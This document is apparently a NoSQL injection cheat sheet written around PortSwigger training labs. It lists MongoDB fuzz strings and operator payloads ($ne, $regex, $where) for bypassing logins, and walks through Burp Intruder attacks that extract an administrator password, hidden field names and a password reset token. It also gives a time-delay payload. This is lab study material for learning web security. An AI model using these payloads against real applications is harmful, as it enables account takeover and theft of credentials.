Submit a fuzz string in the value of the JSON POST or GET web parameter.
Payload example strings for MongoDB:
'
''
"
""
\'
'"`{
;$Foo}
$Foo \xYZ
'\"`{\r;$Foo}\n$Foo \\xYZ\u0000.
' && 0 && 'x
' && 1 && 'x
'fizzy'||'1'=='1'
||1||
fizzy'||1||'
fizzy' && 0 && 'x
fizzy' && 1 && 'x
Determine the meta characters processed and breakng syntax, with true and false statements.
JavaScript condition payload evaluates to true, such as
'||'1'=='1
Nnull character after the category value in MongoDB may ignore all characters after a null characters:
%00
\u0000
Show sensitive database information with allways true statement
../filter?category=Gifts'||1||'
inject query operators to manipulate NoSQL queries:
$where
$ne
$in
$regex
Content Type Converter extension to automatically convert the request method and change a URL-encoded POST request to JSON.
Content-Typeheader toapplication/json
NoSQL bypass authentication using the following payload:
{
"username":{
"$ne":"invalid"
}
,"password":{
"$ne":"invalid"
}
}NoSQL operator injection to bypass authentication:
{
"username":{
"$regex":"admin.*"
},
"password":{
"$ne":""
}
}Send the request again. Notice that this successfully logs you in as the admin user.
NoSQL query uses the
$whereoperator, attempt to inject JavaScript functions into this query so it returns sensitive data.
{"$where":"this.username == 'admin'"}
admin' && this.password.match(/\d/) || 'a'=='b
Identifying field names, by comparing results in responses.
admin' && this.username!='
admin' && this.foo!='
PortSwigger Lab: Exploiting NoSQL injection to extract data
Vulnerable MongoDB NoSQL database site.
URL Encode valid JavaScript payload in the user parameter
wiener'+'
Identify the password length of administrator,
Change the user parameter toadministrator' && this.password.length < 9 || 'a'=='band URL encode payload.
- Change user parameter to
administrator' && this.password[§0§]=='§a§, Make sure to URL-encode the payload. - Set two payload positions for password character position and password lowercase alphabet character.
- Cluster Bomb attack iterates all combinations
- Set payloads 1 as position password max length and 2 alphabet characters
- Start Intruder Attack
- Sort by payload position 1 and lenth results
- result of the password
ycpxhlee
Exploiting NoSQL operator injection to extract unknown fields
NoSQL password payload,
{"$ne":"invalid"}response indicates that the$neoperator has been accepted and the application is vulnerable.
determine the length of possible hidden fields:
{
"username":"carlos",
"password":{"$ne":""},
"$where":"function(){ if(Object.keys(this)[5].length == 1) return 1; else 0;}"
}Send to intruder with where operator payload, to retrieve field parameter names from database.
Two payloads, first identifies the character position number, and the second identifies the character itself.
set the field key to2to identify second field in database, and so on...
{
"username":"carlos",
"password":{
"$ne":"invalid"
},
"$where":"Object.keys(this)[2].match('^.{§§}§§.*')"
}
NoSQL Fields identified:
[0] _id
[1] username
[2] password
[3] email
[4] passwordReset
Next Cluster bomb attack payload is to get value of found JSON parameters, password reset token
passwordReset
"$where":"this.passwordReset.match('^.{§§}§§.*')"
obtained the field name
passwordResetin first intruder attack
and second intruder attach payload above give the token to reset user password.
Browse to the target URL
/forgot-password?passwordReset=966fbc16def16921
After Cluster bomb attack identified the case senitive JSON field and then value of the password reset token retrieved using intruder:
PortSwigger Lab: Exploiting NoSQL operator injection to extract unknown fields
Payload to determine vulnerable based on time delayed response:
{"$where": "sleep(5000)"}